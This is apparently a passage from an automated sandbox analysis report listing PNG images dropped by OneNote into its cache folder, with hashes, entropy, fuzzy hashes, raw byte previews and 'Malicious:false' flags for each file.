                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
